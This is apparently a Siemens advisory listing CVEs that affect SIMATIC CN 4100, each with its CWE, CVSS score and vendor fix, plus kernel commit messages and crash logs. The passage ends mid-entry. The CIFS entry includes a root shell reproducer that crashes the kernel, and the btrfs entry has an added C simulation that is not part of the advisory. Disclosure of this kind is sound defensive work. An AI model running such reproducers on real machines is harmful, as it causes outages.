Vulnerabilities: NULL Pointer Dereference, Reachable Assertion, Use After Free, Out-of-bounds Write, Integer Overflow or Wraparound, Allocation of Resources Without Limits or Throttling, Out-of-bounds Read, Covert Timing Channel, Stack-based Buffer Overflow, Inefficient Algorithmic Complexity, Missing Release of Memory after Effective Lifetime, Improper Restriction of Operations within the Bounds of a Memory Buffer, Improper Input Validation, Improper Locking, Uncontrolled Recursion, Buffer Access with Incorrect Length Value, Race Condition within a Thread, Missing Synchronization, Use of Uninitialized Resource, Double Free, Missing Release of Resource after Effective Lifetime, Loop with Unreachable Exit Condition ('Infinite Loop'), Improper Update of Reference Count, Improper Control of a Resource Through its Lifetime, Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'), Unexpected Status Code or Return Value, Divide By Zero, Improper Validation of Specified Index, Position, or Offset in Input, Comparison Using Wrong Factors, Observable Timing Discrepancy, Improper Validation of Syntactic Correctness of Input, Deadlock, Signal Handler Race Condition, Improper Following of Specification by Caller, Improper Check for Dropped Privileges, Transmission of Private Resources into a New Sphere ('Resource Leak'), Improper Resource Shutdown or Release, Improper Access Control, Exposure of Sensitive Information to an Unauthorized Actor, Relative Path Traversal, Improper Neutralization of Escape, Meta, or Control Sequences, Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade'), Uncontrolled Resource Consumption, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Missing Authentication for Critical Function, Improper Check for Unusual or Exceptional Conditions

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities
For every CVE listed below, the affected product is Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected) and the remediation is the vendor fix: Update to V5.0 or a later version: https://support.industry.siemens.com/cs/ww/en/view/109814144/

CVE-2024-47704: In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check link_res->hpo_dp_link_enc before using it. [WHAT & HOW] Functions dp_enable_link_phy and dp_disable_link_phy can pass link_res without initializing hpo_dp_link_enc and it is necessary to check for null before dereferencing. This fixes 2 FORWARD_NULL issues reported by Coverity.
Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS 3.1 Base Score 5.5 (MEDIUM), Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2024-57924: In the Linux kernel, the following vulnerability has been resolved: fs: relax assertions on failure to encode file handles. Encoding file handles is usually performed by a filesystem ->encode_fh() method that may fail for various reasons. The legacy users of exportfs_encode_fh(), namely, nfsd and name_to_handle_at(2) syscall are ready to cope with the possibility of failure to encode a file handle. There are a few other users of exportfs_encode_{fh,fid}() that currently have a WARN_ON() assertion when ->encode_fh() fails. Relax those assertions because they are wrong. The second linked bug report states commit 16aac5ad1fa9 ("ovl: support encoding non-decodable file handles") in v6.6 as the regressing commit, but this is not accurate. The aforementioned commit only increases the chances of the assertion and allows triggering the assertion with the reproducer using overlayfs, inotify and drop_caches. Triggering this assertion was always possible with other filesystems and other reasons of ->encode_fh() failures and more particularly, it was also possible with the exact same reproducer using overlayfs that is mounted with options index=on,nfs_export=on also on kernels < v6.6. Therefore, I am not listing the aforementioned commit as a Fixes commit. Backport hint: this patch will have a trivial conflict applying to v6.6.y, and other trivial conflicts applying to stable kernels < v6.6.
Relevant CWE: CWE-617 Reachable Assertion
Metrics: CVSS 3.1 Base Score 5.5 (MEDIUM), Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2024-58240: In the Linux kernel, the following vulnerability has been resolved: tls: separate no-async decryption request handling from async. If we're not doing async, the handling is much simpler. There's no reference counting, we just need to wait for the completion to wake us up and return its result. We should preferably also use a separate crypto_wait. I'm not seeing a UAF as I did in the past, I think aec7961916f3 ("tls: fix race between async notify and socket close") took care of it. This will make the next fix easier.
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS 3.1 Base Score 7.3 (HIGH), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE-2025-6021: A flaw was found in libxml2's xmlBuildQName function, where integer overflows in buffer size calculations can lead to a stack-based buffer overflow. This issue can result in memory corruption or a denial of service when processing crafted input.
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1 Base Score 7.5 (HIGH), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-6052: A flaw was found in how GLib's GString manages memory when adding data to strings. If a string is already very large, combining it with more input can cause a hidden overflow in the size calculation. This makes the system think it has enough memory when it doesn't. As a result, data may be written past the end of the allocated memory, leading to crashes or memory corruption.
Relevant CWE: CWE-190 Integer Overflow or Wraparound
Metrics: CVSS 3.1 Base Score 3.7 (LOW), Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-7425: A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption.
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS 3.1 Base Score 7.8 (HIGH), Vector String CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H

CVE-2025-8916: Allocation of Resources Without Limits or Throttling vulnerability in Legion of the Bouncy Castle Inc. BC Java bcpkix on All (API modules), Legion of the Bouncy Castle Inc. BC Java bcprov on All (API modules), Legion of the Bouncy Castle Inc. BCPKIX FIPS bcpkix-fips on All (API modules) allows Excessive Allocation. This vulnerability is associated with program files https://github.Com/bcgit/bc-java/blob/main/pkix/src/main/java/org/bouncycastle/pkix/jcajce/PKIXCertPathReviewer.Java, https://github.Com/bcgit/bc-java/blob/main/prov/src/main/java/org/bouncycastle/x509/PKIXCertPathReviewer.Java. This issue affects BC Java: from 1.44 through 1.78; BC Java: from 1.44 through 1.78; BCPKIX FIPS: from 1.0.0 through 1.0.7, from 2.0.0 through 2.0.7.
Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling
Metrics: CVSS 3.1 Base Score 5.3 (MEDIUM), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-9230: Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Impact summary: This out-of-bounds read may trigger a crash which leads to Denial of Service for an application. The out-of-bounds write can cause a memory corruption which can have various consequences including a Denial of Service or Execution of attacker-supplied code. Although the consequences of a successful exploit of this vulnerability could be severe, the probability that the attacker would be able to perform it is low. Besides, password based (PWRI) encryption support in CMS messages is very rarely used. For that reason the issue was assessed as Moderate severity according to our Security Policy. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the CMS implementation is outside the OpenSSL FIPS module boundary.
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS 3.1 Base Score 7.5 (HIGH), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-9231: Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms. Impact summary: A timing side-channel in SM2 signature computations on 64 bit ARM platforms could allow recovering the private key by an attacker. While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack. OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm.
Relevant CWE: CWE-385 Covert Timing Channel
Metrics: CVSS 3.1 Base Score 6.5 (MEDIUM), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

CVE-2025-9232: Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address. Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary.
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS 3.1 Base Score 5.9 (MEDIUM), Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-9820: A flaw was found in the GnuTLS library, specifically in the gnutls_pkcs11_token_init() function that handles PKCS#11 token initialization. When a token label longer than expected is processed, the function writes past the end of a fixed-size stack buffer. This programming error can cause the application using GnuTLS to crash or, in certain conditions, be exploited for code execution. As a result, systems or applications relying on GnuTLS may be vulnerable to a denial of service or local privilege escalation attacks.
Relevant CWE: CWE-121 Stack-based Buffer Overflow
Metrics: CVSS 3.1 Base Score 4.0 (MEDIUM), Vector String CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-14831: A flaw was found in GnuTLS.
This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-407 Inefficient Algorithmic Complexity
CVSS 3.1: base score 5.3 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-23143

In the Linux kernel, the following vulnerability has been resolved:

net: Fix null-ptr-deref by sock_lock_init_class_and_name() and rmmod.

When I ran the repro [0] and waited a few seconds, I observed two LOCKDEP splats: a warning immediately followed by a null-ptr-deref. [1]

Reproduction Steps:
1) Mount CIFS
2) Add an iptables rule to drop incoming FIN packets for CIFS
3) Unmount CIFS
4) Unload the CIFS module
5) Remove the iptables rule

At step 3), the CIFS module calls sock_release() for the underlying TCP socket, and it returns quickly. However, the socket remains in FIN_WAIT_1 because incoming FIN packets are dropped. At this point, the module's refcnt is 0 while the socket is still alive, so the following rmmod command succeeds.

    # ss -tan
    State       Recv-Q Send-Q Local Address:Port Peer Address:Port
    FIN-WAIT-1  0      477    10.0.2.15:51062    10.0.0.137:445
    # lsmod | grep cifs
    cifs                 1159168  0

This highlights a discrepancy between the lifetime of the CIFS module and the underlying TCP socket. Even after CIFS calls sock_release() and it returns, the TCP socket does not die immediately in order to close the connection gracefully.

While this is generally fine, it causes an issue with LOCKDEP because CIFS assigns a different lock class to the TCP socket's sk->sk_lock using sock_lock_init_class_and_name(). Once an incoming packet is processed for the socket or a timer fires, sk->sk_lock is acquired. Then, LOCKDEP checks the lock context in check_wait_context(), where hlock_class() is called to retrieve the lock class. However, since the module has already been unloaded, hlock_class() logs a warning and returns NULL, triggering the null-ptr-deref.

If LOCKDEP is enabled, we must ensure that a module calling sock_lock_init_class_and_name() (CIFS, NFS, etc) cannot be unloaded while such a socket is still alive to prevent this issue.

Let's hold the module reference in sock_lock_init_class_and_name() and release it when the socket is freed in sk_prot_free().

Note that sock_lock_init() clears sk->sk_owner for svc_create_socket() that calls sock_lock_init_class_and_name() for a listening socket, which clones a socket by sk_clone_lock() without GFP_ZERO.

[0]:
    CIFS_SERVER="10.0.0.137"
    CIFS_PATH="//${CIFS_SERVER}/Users/Administrator/Desktop/CIFS_TEST"
    DEV="enp0s3"
    CRED="/root/WindowsCredential.txt"

    MNT=$(mktemp -d /tmp/XXXXXX)
    mount -t cifs ${CIFS_PATH} ${MNT} -o vers=3.0,credentials=${CRED},cache=none,echo_interval=1

    iptables -A INPUT -s ${CIFS_SERVER} -j DROP

    for i in $(seq 10);
    do
        umount ${MNT}
        rmmod cifs
        sleep 1
    done

    rm -r ${MNT}

    iptables -D INPUT -s ${CIFS_SERVER} -j DROP

[1]:
    DEBUG_LOCKS_WARN_ON(1)
    WARNING: CPU: 10 PID: 0 at kernel/locking/lockdep.c:234 hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223)
    Modules linked in: cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]
    CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Not tainted 6.14.0 #36
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
    RIP: 0010:hlock_class (kernel/locking/lockdep.c:234 kernel/locking/lockdep.c:223)
    ...
    Call Trace:
     __lock_acquire (kernel/locking/lockdep.c:4853 kernel/locking/lockdep.c:5178)
     lock_acquire (kernel/locking/lockdep.c:469 kernel/locking/lockdep.c:5853 kernel/locking/lockdep.c:5816)
     _raw_spin_lock_nested (kernel/locking/spinlock.c:379)
     tcp_v4_rcv (./include/linux/skbuff.h:1678 ./include/net/tcp.h:2547 net/ipv4/tcp_ipv4.c:2350)
    ...

    BUG: kernel NULL pointer dereference, address: 00000000000000c4
    PF: supervisor read access in kernel mode
    PF: error_code(0x0000) - not-present page
    PGD 0
    Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI
    CPU: 10 UID: 0 PID: 0 Comm: swapper/10 Tainted: G        W          6.14.0 #36
    Tainted: [W]=WARN
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014
    RIP: 0010:__lock_acquire (kernel/
    ---truncated---

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-476 NULL Pointer Dereference
CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-23160

In the Linux kernel, the following vulnerability has been resolved:

media: mediatek: vcodec: Fix a resource leak related to the scp device in FW initialization

On Mediatek devices with a system companion processor (SCP) the mtk_scp structure has to be removed explicitly to avoid a resource leak. Free the structure in case the allocation of the firmware structure fails during the firmware initialization.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-401 Missing Release of Memory after Effective Lifetime
CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-31257

This issue was addressed with improved memory handling. This issue is fixed in Safari 18.5, iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, tvOS 18.5, visionOS 2.5, watchOS 11.5. Processing maliciously crafted web content may lead to an unexpected Safari crash.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
CVSS 3.1: base score 4.7 (MEDIUM), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L

CVE-2025-37931

In the Linux kernel, the following vulnerability has been resolved:

btrfs: adjust subpage bit start based on sectorsize

When running machines with 64k page size and a 16k nodesize we started seeing tree log corruption in production. This turned out to be because we were not writing out dirty blocks sometimes, so this in fact affects all metadata writes.

When writing out a subpage EB we scan the subpage bitmap for a dirty range. If the range isn't dirty we do

    bit_start++;

to move onto the next bit. The problem is the bitmap is based on the number of sectors that an EB has. So in this case, we have a 64k pagesize, 16k nodesize, but a 4k sectorsize. This means our bitmap is 4 bits for every node. With a 64k page size we end up with 4 nodes per page.

To make this easier this is how everything looks

    [0         16k        32k        48k       ]   logical address
    [0         4          8          12        ]   radix tree offset
    [                 64k page                 ]   folio
    [ 16k eb ][ 16k eb ][ 16k eb ][ 16k eb ]       extent buffers
    [ | | | | | | | | | | | | | | | | ]           bitmap

Now we use all of our addressing based on fs_info->sectorsize_bits, so as you can see the above our 16k eb->start turns into radix entry 4.

When we find a dirty range for our eb, we correctly do bit_start += sectors_per_node, because if we start at bit 0, the next bit for the next eb is 4, to correspond to eb->start 16k.

However if our range is clean, we will do bit_start++, which will now put us offset from our radix tree entries.

In our case, assume that the first time we check the bitmap the block is not dirty, we increment bit_start so now it == 1, and then we loop around and check again. This time it is dirty, and we go to find that start using the following equation

    start = folio_start + bit_start * fs_info->sectorsize;

so in the case above, eb->start 0 is now dirty, and we calculate start as

    0 + 1 * fs_info->sectorsize = 4096
    4096 >> 12 = 1

Now we're looking up the radix tree for 1, and we won't find an eb. What's worse is now we're using bit_start == 1, so we do bit_start += sectors_per_node, which is now 5. If that eb is dirty we will run into the same thing, we will look at an offset that is not populated in the radix tree, and now we're skipping the writeout of dirty extent buffers.

The best fix for this is to not use sectorsize_bits to address nodes, but that's a larger change. Since this is a fs corruption problem fix it simply by always using sectors_per_node to increment the start bit.
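The stepping error the btrfs entry above describes, as an added simulation that is not part of the advisory or of the kernel source: a 64k folio holding four 16k extent buffers over a 4k sectorsize is walked once with the buggy clean-bit increment (bit_start++) and once with the fixed one (bit_start += sectors_per_node), and the two walks are compared on how many dirty extent buffers they actually submit. The folio model, the names (sim_folio, lookup_eb, scan_folio) and the dirty pattern are constructed for the example; the static bitmap with eb0's first sector clean stands in for the "not dirty, then dirty" sequence the message assumes.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Geometry taken from the advisory text: 64k page, 16k nodesize, 4k sectorsize. */
#define PAGE_SIZE_SIM    (64u * 1024)
#define NODESIZE_SIM     (16u * 1024)
#define SECTORSIZE_SIM   (4u * 1024)
#define SECTORSIZE_BITS  12u                               /* 4096 == 1 << 12 */
#define SECTORS_PER_PAGE (PAGE_SIZE_SIM / SECTORSIZE_SIM)  /* 16 bits in the dirty bitmap */
#define SECTORS_PER_NODE (NODESIZE_SIM / SECTORSIZE_SIM)   /* 4 bitmap bits per extent buffer */
#define NODES_PER_PAGE   (PAGE_SIZE_SIM / NODESIZE_SIM)    /* 4 extent buffers per folio */

#define BUGGY_CLEAN_STEP 1u                 /* bit_start++ on a clean bit */
#define FIXED_CLEAN_STEP SECTORS_PER_NODE   /* bit_start += sectors_per_node on a clean bit */

/* Constructed stand-in for one folio plus the radix tree entries covering it. */
struct sim_folio {
    uint64_t folio_start;                /* logical address of the folio */
    uint32_t dirty_bitmap;               /* one bit per sector, bit 0 = first sector */
    bool     eb_present[NODES_PER_PAGE]; /* eb i is keyed at radix offset i * SECTORS_PER_NODE */
    bool     eb_written[NODES_PER_PAGE];
};

/* Stand-in for find_extent_buffer_nolock(): the tree is keyed by start >> sectorsize_bits
 * and only node-aligned keys are populated, so a misaligned start finds nothing. */
static int lookup_eb(const struct sim_folio *f, uint64_t start)
{
    uint64_t off = (start >> SECTORSIZE_BITS) - (f->folio_start >> SECTORSIZE_BITS);
    if (off % SECTORS_PER_NODE != 0)
        return -1;
    uint64_t idx = off / SECTORS_PER_NODE;
    if (idx >= NODES_PER_PAGE || !f->eb_present[idx])
        return -1;
    return (int)idx;
}

/* Models the dirty-bitmap walk of submit_eb_subpage(). clean_step is what the loop adds
 * to bit_start when the tested bit is clean. Returns the number of extent buffers
 * submitted; *misses counts dirty bits whose computed start matched no eb (lost writeout). */
static unsigned scan_folio(struct sim_folio *f, unsigned clean_step, unsigned *misses)
{
    unsigned written = 0, bit_start = 0;
    *misses = 0;
    while (bit_start < SECTORS_PER_PAGE) {
        if (!(f->dirty_bitmap & (1u << bit_start))) {
            bit_start += clean_step;
            continue;
        }
        /* start = folio_start + bit_start * fs_info->sectorsize, as in the message */
        uint64_t start = f->folio_start + (uint64_t)bit_start * SECTORSIZE_SIM;
        bit_start += SECTORS_PER_NODE;
        int idx = lookup_eb(f, start);
        if (idx < 0) {
            (*misses)++;   /* dirty sectors but no eb at that key: nothing is written */
            continue;
        }
        f->eb_written[idx] = true;
        written++;
    }
    return written;
}

/* Constructed scenario: eb0's first sector reads clean while its later sectors are dirty,
 * eb1 is dirty, eb2 is clean, eb3 is dirty. */
static void init_scenario(struct sim_folio *f)
{
    memset(f, 0, sizeof(*f));
    f->folio_start = 3 * PAGE_SIZE_SIM;      /* any folio-aligned address works */
    for (unsigned i = 0; i < NODES_PER_PAGE; i++)
        f->eb_present[i] = true;
    f->dirty_bitmap = 0xF0FEu;               /* bits 1-3, 4-7 and 12-15 set */
}

/* Plain-value wrappers: how many ebs each variant writes and how many lookups it loses. */
unsigned ebs_written(unsigned clean_step)
{
    struct sim_folio f; unsigned misses;
    init_scenario(&f);
    return scan_folio(&f, clean_step, &misses);
}

unsigned lookups_missed(unsigned clean_step)
{
    struct sim_folio f; unsigned misses;
    init_scenario(&f);
    scan_folio(&f, clean_step, &misses);
    return misses;
}

int main(void)
{
    printf("buggy (bit_start++):          %u ebs written, %u dirty lookups missed\n",
           ebs_written(BUGGY_CLEAN_STEP), lookups_missed(BUGGY_CLEAN_STEP));
    printf("fixed (+= sectors_per_node):  %u ebs written, %u dirty lookups missed\n",
           ebs_written(FIXED_CLEAN_STEP), lookups_missed(FIXED_CLEAN_STEP));
    return 0;
}
```

With the buggy step the walk drifts to bits 1, 5 and 9 and loses eb1 entirely, which is the silent skipped writeout behind the reported tree log corruption; with the fixed step every lookup is node-aligned.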
Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-37968

In the Linux kernel, the following vulnerability has been resolved:

iio: light: opt3001: fix deadlock due to concurrent flag access

The threaded IRQ function in this driver is reading the flag twice: once to lock a mutex and once to unlock it. Even though the code setting the flag is designed to prevent it, there are subtle cases where the flag could be true at the mutex_lock stage and false at the mutex_unlock stage. This results in the mutex not being unlocked, resulting in a deadlock.

Fix it by making the opt3001_irq() code generally more robust, reading the flag into a variable and using the variable value at both stages.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-667 Improper Locking
CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38322

In the Linux kernel, the following vulnerability has been resolved:

perf/x86/intel: Fix crash in icl_update_topdown_event()

The perf_fuzzer found a hard-lockup crash on a RaptorLake machine:

    Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000
    CPU: 23 UID: 0 PID: 0 Comm: swapper/23 Tainted: [W]=WARN
    Hardware name: Dell Inc. Precision 9660/0VJ762
    RIP: 0010:native_read_pmc+0x7/0x40
    Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...
    RSP: 000:fffb03100273de8 EFLAGS: 00010046
    ....
    Call Trace:
     icl_update_topdown_event+0x165/0x190
     ? ktime_get+0x38/0xd0
     intel_pmu_read_event+0xf9/0x210
     __perf_event_read+0xf9/0x210

CPUs 16-23 are E-core CPUs that don't support the perf metrics feature. The icl_update_topdown_event() should not be invoked on these CPUs.

It's a regression of commit:

    f9bdf1f95339 ("perf/x86/intel: Avoid disable PMU if !cpuc->enabled in sample read")

The bug introduced by that commit is that the is_topdown_event() function is mistakenly used to replace the is_topdown_count() call to check if the topdown functions for the perf metrics feature should be invoked.

Fix it.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38347

In the Linux kernel, the following vulnerability has been resolved:

f2fs: fix to do sanity check on ino and xnid

syzbot reported a f2fs bug as below:

    INFO: task syz-executor140:5308 blocked for more than 143 seconds.
          Not tainted 6.14.0-rc7-syzkaller-00069-g81e4f8d68c66 #0
    "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
    task:syz-executor140 state:D stack:24016 pid:5308 tgid:5308 ppid:5306 task_flags:0x400140 flags:0x00000006
    Call Trace:
     context_switch kernel/sched/core.c:5378 [inline]
     __schedule+0x190e/0x4c90 kernel/sched/core.c:6765
     __schedule_loop kernel/sched/core.c:6842 [inline]
     schedule+0x14b/0x320 kernel/sched/core.c:6857
     io_schedule+0x8d/0x110 kernel/sched/core.c:7690
     folio_wait_bit_common+0x839/0xee0 mm/filemap.c:1317
     __folio_lock mm/filemap.c:1664 [inline]
     folio_lock include/linux/pagemap.h:1163 [inline]
     __filemap_get_folio+0x147/0xb40 mm/filemap.c:1917
     pagecache_get_page+0x2c/0x130 mm/folio-compat.c:87
     find_get_page_flags include/linux/pagemap.h:842 [inline]
     f2fs_grab_cache_page+0x2b/0x320 fs/f2fs/f2fs.h:2776
     __get_node_page+0x131/0x11b0 fs/f2fs/node.c:1463
     read_xattr_block+0xfb/0x190 fs/f2fs/xattr.c:306
     lookup_all_xattrs fs/f2fs/xattr.c:355 [inline]
     f2fs_getxattr+0x676/0xf70 fs/f2fs/xattr.c:533
     __f2fs_get_acl+0x52/0x870 fs/f2fs/acl.c:179
     f2fs_acl_create fs/f2fs/acl.c:375 [inline]
     f2fs_init_acl+0xd7/0x9b0 fs/f2fs/acl.c:418
     f2fs_init_inode_metadata+0xa0f/0x1050 fs/f2fs/dir.c:539
     f2fs_add_inline_entry+0x448/0x860 fs/f2fs/inline.c:666
     f2fs_add_dentry+0xba/0x1e0 fs/f2fs/dir.c:765
     f2fs_do_add_link+0x28c/0x3a0 fs/f2fs/dir.c:808
     f2fs_add_link fs/f2fs/f2fs.h:3616 [inline]
     f2fs_mknod+0x2e8/0x5b0 fs/f2fs/namei.c:766
     vfs_mknod+0x36d/0x3b0 fs/namei.c:4191
     unix_bind_bsd net/unix/af_unix.c:1286 [inline]
     unix_bind+0x563/0xe30 net/unix/af_unix.c:1379
     __sys_bind_socket net/socket.c:1817 [inline]
     __sys_bind+0x1e4/0x290 net/socket.c:1848
     __do_sys_bind net/socket.c:1853 [inline]
     __se_sys_bind net/socket.c:1851 [inline]
     __x64_sys_bind+0x7a/0x90 net/socket.c:1851
     do_syscall_x64 arch/x86/entry/common.c:52 [inline]
     do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83
     entry_SYSCALL_64_after_hwframe+0x77/0x7f

Let's dump and check metadata of the corrupted inode; it shows its xattr_nid is the same as its i_ino.

    dump.f2fs -i 3 chaseyu.img.raw
    i_xattr_nid                     [0x       3 : 3]

So, during mknod in the corrupted directory, it tries to get and lock the inode page twice, resulting in a deadlock.

    - f2fs_mknod
     - f2fs_add_inline_entry
      - f2fs_get_inode_page           --- lock dir's inode page
      - f2fs_init_acl
       - f2fs_acl_create(dir,..)
        - __f2fs_get_acl
         - f2fs_getxattr
          - lookup_all_xattrs
           - __get_node_page          --- try to lock dir's inode page

In order to fix this, let's add a sanity check on ino and xnid.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38491

In the Linux kernel, the following vulnerability has been resolved:

mptcp: make fallback action and fallback decision atomic

Syzkaller reported the following splat:

    WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 __mptcp_do_fallback net/mptcp/protocol.h:1223 [inline]
    WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 mptcp_do_fallback net/mptcp/protocol.h:1244 [inline]
    WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 check_fully_established net/mptcp/options.c:982 [inline]
    WARNING: CPU: 1 PID: 7704 at net/mptcp/protocol.h:1223 mptcp_incoming_options+0x21a8/0x2510 net/mptcp/options.c:1153
    Modules linked in:
    CPU: 1 UID: 0 PID: 7704 Comm: syz.3.1419 Not tainted 6.16.0-rc3-gbd5ce2324dba #20 PREEMPT(voluntary)
    Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
    RIP: 0010:__mptcp_do_fallback net/mptcp/protocol.h:1223 [inline]
    RIP: 0010:mptcp_do_fallback net/mptcp/protocol.h:1244 [inline]
    RIP: 0010:check_fully_established net/mptcp/options.c:982 [inline]
    RIP: 0010:mptcp_incoming_options+0x21a8/0x2510 net/mptcp/options.c:1153
